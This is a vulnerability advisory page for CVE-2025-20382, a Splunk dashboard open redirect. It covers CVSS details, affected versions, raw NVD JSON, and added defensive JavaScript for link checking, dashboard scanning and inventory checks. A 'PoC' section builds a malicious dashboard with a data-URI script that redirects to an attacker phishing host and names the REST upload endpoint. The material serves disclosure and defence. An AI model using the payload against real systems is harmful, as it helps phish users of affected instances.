Security Vulnerability Report

CVE-2025-20382 CVSS 3.5 LOW

Published: 2025-12-03 17:15:50
Last Modified: 2025-12-05 18:33:46

Description

In Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.10, 10.0.2503.8, and 9.3.2411.120, a low-privileged user who does not hold the "admin" or "power" Splunk roles can create a views dashboard with a custom background that uses the `data:image/png;base64` URI scheme, which can lead to an unvalidated redirect (CWE-601). A specially crafted URL in that background circumvents the Splunk external URL warning mechanism, so the victim is sent to an external malicious site without the usual interstitial warning. Exploitation requires phishing: the attacker must trick the victim into initiating the request in the victim's own browser, so the low-privileged account alone cannot trigger the redirect against another user at will.
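
The failure mode described above, an external-link check that a `data:` URL slips past, as an added example. This is not Splunk's code and it is not taken from the advisory, which does not publish the crafted URL; it shows a naive "is this link external?" check that only looks at the hostname, a scheme-allowlisting check that fails closed, and a small helper for hunting exported dashboard source for URLs that are not http(s). `APP_ORIGIN`, the function names and `SAMPLE_DASHBOARD` are this example's own assumptions and constructed input.

```javascript
// Added example, not Splunk's code: an external-link check of the kind the
// advisory says was bypassed, in a weak and a hardened form, plus a helper for
// hunting dashboards that already carry data:/javascript: URLs.
// APP_ORIGIN, the function names and SAMPLE_DASHBOARD are assumptions.

const APP_ORIGIN = "https://splunk.example.internal:8000"; // assumed Splunk Web origin

// Weak check: "external" means "has a hostname that is not ours". A data: or
// javascript: URL parses with an empty hostname, so it is never flagged even
// though its content is entirely attacker-controlled.
function isExternalNaive(href) {
  let url;
  try {
    url = new URL(href, APP_ORIGIN);
  } catch {
    return false; // unparsable input treated as internal: also a bug
  }
  return url.hostname !== "" && url.hostname !== new URL(APP_ORIGIN).hostname;
}

// Hardened check: allowlist the scheme first, then require an exact origin match
// (scheme, host and port). Everything else, including unparsable input, is
// treated as external and gets the warning interstitial.
function isExternalStrict(href) {
  let url;
  try {
    url = new URL(href, APP_ORIGIN);
  } catch {
    return true; // fail closed
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return true;
  return url.origin !== new URL(APP_ORIGIN).origin;
}

// Hunt helper: return every URL in dashboard XML/HTML source (CSS url(...),
// href= and src= attributes) whose scheme is not http or https. Relative URLs
// have no scheme and are skipped.
function findNonHttpUris(source) {
  const re = /url\(\s*(?:"([^"]*)"|'([^']*)'|([^)]*))\s*\)|(?:href|src)\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
  const hits = [];
  let m;
  while ((m = re.exec(source)) !== null) {
    const value = (m[1] ?? m[2] ?? m[3] ?? m[4] ?? m[5] ?? "").trim();
    const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(value);
    if (scheme && !["http", "https"].includes(scheme[1].toLowerCase())) hits.push(value);
  }
  return hits;
}

// Constructed sample of exported dashboard source (not a real Splunk export).
const SAMPLE_DASHBOARD = `
<dashboard>
  <label>Quarterly Review</label>
  <row><panel><html>
    <div style="background-image: url('data:image/png;base64,iVBORw0KGgo=')">
      <a href="https://splunk.example.internal:8000/app/search">internal link</a>
      <a href="javascript:void(0)">click me</a>
      <img src="/static/app/logo.png">
    </div>
  </html></panel></row>
</dashboard>`;

for (const href of ["data:text/html;base64,PGh0bWw+", "javascript:alert(1)",
                    "https://attacker.example/phish", "/app/search/dashboard"]) {
  console.log(href, "naive:", isExternalNaive(href), "strict:", isExternalStrict(href));
}
console.log("non-http(s) URIs in sample:", findNonHttpUris(SAMPLE_DASHBOARD));
```

The point of the strict variant is ordering: decide on the scheme before looking at the host, because the WHATWG URL parser happily returns an empty hostname for `data:` and `javascript:` URLs, and compare full origins rather than hostnames so a port or scheme change is also treated as leaving the application.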

CVSS Details

CVSS Score (CNA, secondary)
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N

CVSS Score (NVD, primary)
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Weakness
CWE-601 (URL Redirection to Untrusted Site, "Open Redirect")

Both vectors agree on exploitability (network, low complexity, low privileges, user interaction required). They differ only in NVD marking Scope as Changed and adding a low Integrity impact, which lifts its score from 3.5 to 5.4; the 3.5 LOW shown in the page header is the CNA score.

Configurations (Affected Products)

cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* - Splunk Enterprise 9.2.0 up to but not including 9.2.10 - VULNERABLE
cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* - Splunk Enterprise 9.3.0 up to but not including 9.3.8 - VULNERABLE
cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* - Splunk Enterprise 9.4.0 up to but not including 9.4.6 - VULNERABLE
cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* - Splunk Enterprise 10.0.0 up to but not including 10.0.2 - VULNERABLE
cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:* - Splunk Cloud Platform 9.3.2411 up to but not including 9.3.2411.120 - VULNERABLE
cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:* - Splunk Cloud Platform 10.0.2503 up to but not including 10.0.2503.8 - VULNERABLE
cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:* - Splunk Cloud Platform 10.1.2507 up to but not including 10.1.2507.10 - VULNERABLE

Fixed in: Splunk Enterprise 9.2.10, 9.3.8, 9.4.6 and 10.0.2; Splunk Cloud Platform 9.3.2411.120, 10.0.2503.8 and 10.1.2507.10. Versions older than 9.2.0 fall outside every listed range, which only means the NVD configuration does not cover them.
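
To turn the ranges above into something that can be run over an inventory, here is an added example (not Splunk's or NVD's code) that compares dotted Splunk version strings against the ranges on this page. The ranges are copied from the NVD configuration data (start inclusive, end exclusive); `AFFECTED_RANGES`, the function names and `SAMPLE_INVENTORY` are this example's own.

```javascript
// Added example, not Splunk's or NVD's code: check Splunk version strings against
// the affected ranges published on this page. AFFECTED_RANGES copies the NVD
// cpeMatch ranges (start inclusive, end exclusive); SAMPLE_INVENTORY is constructed.

const AFFECTED_RANGES = [
  { product: "Splunk Enterprise",     from: "9.2.0",     fixed: "9.2.10" },
  { product: "Splunk Enterprise",     from: "9.3.0",     fixed: "9.3.8" },
  { product: "Splunk Enterprise",     from: "9.4.0",     fixed: "9.4.6" },
  { product: "Splunk Enterprise",     from: "10.0.0",    fixed: "10.0.2" },
  { product: "Splunk Cloud Platform", from: "9.3.2411",  fixed: "9.3.2411.120" },
  { product: "Splunk Cloud Platform", from: "10.0.2503", fixed: "10.0.2503.8" },
  { product: "Splunk Cloud Platform", from: "10.1.2507", fixed: "10.1.2507.10" },
];

// Component-wise numeric comparison of dotted versions. A missing trailing
// component counts as 0, so "9.3.2411" equals "9.3.2411.0" and sorts below
// "9.3.2411.120"; plain string comparison would get "9.3.2411.9" vs
// "9.3.2411.120" wrong. Non-numeric components are rejected rather than guessed.
function compareVersions(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const x = pa[i] ?? 0;
    const y = pb[i] ?? 0;
    if (Number.isNaN(x) || Number.isNaN(y)) {
      throw new Error(`non-numeric version component in "${a}" or "${b}"`);
    }
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Returns the matching range when from <= version < fixed for that product, else null.
// null means "outside every published range", not "assessed as safe": 9.1.x and
// older simply are not listed in the NVD configuration.
function affectedRange(product, version) {
  for (const r of AFFECTED_RANGES) {
    if (r.product !== product) continue;
    if (compareVersions(version, r.from) >= 0 && compareVersions(version, r.fixed) < 0) {
      return r;
    }
  }
  return null;
}

function isAffected(product, version) {
  return affectedRange(product, version) !== null;
}

// Reduce an inventory to the entries that need the upgrade, with the fixed version to target.
function affectedEntries(inventory) {
  return inventory.flatMap(({ host, product, version }) => {
    const r = affectedRange(product, version);
    return r ? [{ host, product, version, upgradeTo: r.fixed }] : [];
  });
}

// Constructed inventory, not real hosts.
const SAMPLE_INVENTORY = [
  { host: "sh-01",   product: "Splunk Enterprise",     version: "9.4.5" },
  { host: "sh-02",   product: "Splunk Enterprise",     version: "9.4.6" },
  { host: "idx-01",  product: "Splunk Enterprise",     version: "9.1.7" },
  { host: "stack-a", product: "Splunk Cloud Platform", version: "10.0.2503.3" },
  { host: "stack-b", product: "Splunk Cloud Platform", version: "10.0.2503.8" },
];

console.log(affectedEntries(SAMPLE_INVENTORY));
```

The four-component Splunk Cloud versions are the reason for the padded comparison: a check that compares strings, or that truncates to three components, would put 9.3.2411.120 on the wrong side of 9.3.2411.9 or treat the whole 9.3.2411 train as one version.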

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-20382 PoC sketch - Splunk unvalidated redirect via a data: URI dashboard background.
// This sketch only builds the artifacts; it sends nothing. Two limits on what it shows:
//   * A data:text/html URI placed in a CSS background-image is fetched as an image and is
//     never rendered as a document, so the inline script below does not run from that position.
//   * The advisory describes a data:image/png;base64 background combined with a "specially
//     crafted URL"; the crafted URL itself is not published and is not reproduced here.

// Step 1: a data URI carrying an HTML document that navigates to an attacker-controlled site.
const maliciousDataUri = 'data:text/html;base64,' + btoa(`
<html>
  <body>
    <script>
      // Redirect to attacker-controlled site
      window.location.href = 'https://attacker.example.com/phishing';
    </script>
  </body>
</html>
`);

// Step 2: Simple XML dashboard whose HTML panel references the data URI as a background.
const dashboardXml = `
<dashboard>
  <label>Malicious Dashboard</label>
  <row>
    <panel>
      <html>
        <div style="background-image: url('${maliciousDataUri}')">
          <h1>Click here for more info</h1>
        </div>
      </html>
    </panel>
  </row>
</dashboard>
`;

// Step 3: Upload the dashboard through the Splunk REST API (management port 8089).
// The original sketch pointed at .../saved/searches, which creates a saved search, not a view;
// dashboards (views) are managed under .../data/ui/views.
const splunkApiUrl = 'https://target-splunk.com:8089/servicesNS/{user}/{app}/data/ui/views';

// Note: the attacker needs only a low-privileged Splunk account (no admin or power role).
// The victim must open the dashboard and interact with it in their own browser (UI:R).

References

https://advisory.splunk.com/advisories/SVD-2025-1201 (Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-20382",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-03T17:15:50.380",
    "lastModified": "2025-12-05T18:33:45.600",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "In Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.10, 10.0.2503.8, and 9.3.2411.120, a low-privileged user that does not hold the \"admin\" or \"power\" Splunk roles could create a views dashboard with a custom background using the `data:image/png;base64` protocol that could potentially lead to an unvalidated redirect. This behavior circumvents the Splunk external URL warning mechanism by using a specially crafted URL, allowing for a redirection to an external malicious site. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The authenticated user should not be able to exploit the vulnerability at will."},
      {"lang": "es", "value": "En las versiones de Splunk Enterprise anteriores a 10.0.2, 9.4.6, 9.3.8 y 9.2.10, y en las versiones de Splunk Cloud Platform anteriores a 10.1.2507.10, 10.0.2503.8 y 9.3.2411.120, un usuario con privilegios bajos que no posee los roles de Splunk 'admin' o 'power' podría crear un panel de vistas con un fondo personalizado utilizando el protocolo 'data:image/png;base64' que podría conducir potencialmente a una redirección no validada. Este comportamiento elude el mecanismo de advertencia de URL externa de Splunk mediante el uso de una URL especialmente diseñada, permitiendo una redirección a un sitio malicioso externo. La vulnerabilidad requiere que el atacante realice phishing a la víctima engañándolos para que inicien una solicitud dentro de su navegador. El usuario autenticado no debería poder explotar la vulnerabilidad a voluntad."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4},
        {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}
    ],
    "configurations": [
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [
        {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.10", "matchCriteriaId": "AE8BF109-2B9C-4C50-AC9F-10A45456FD75"},
        {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.3.0", "versionEndExcluding": "9.3.8", "matchCriteriaId": "05D6973D-D965-42D3-8320-AF4A4B424E6C"},
        {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "9.4.0", "versionEndExcluding": "9.4.6", "matchCriteriaId": "8571F470-6AE1-4737-B1FA-49121E426AF2"},
        {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.0.2", "matchCriteriaId": "4413D4BE-F225-4C28-B401-EB46D8F34160"},
        {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.3.2411", "versionEndExcluding": "9.3.2411.120", "matchCriteriaId": "B6CA3000-9C26-45B9-A2A2-C22F3F4246BC"},
        {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.2503", "versionEndExcluding": "10.0.2503.8", "matchCriteriaId": "D269788F-7244-4307-B551-C1B943EF2BB9"},
        {"vulnerable": true, "criteria": "cpe:2.3:a:splunk:splunk_cloud_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.2507", "versionEndExcluding": "10.1.2507.10", "matchCriteriaId": "B4124F3F-581D-429F-AB92-4C7515AA16A5"}
      ]}]}
    ],
    "references": [
      {"url": "https://advisory.splunk.com/advisories/SVD-2025-1201", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}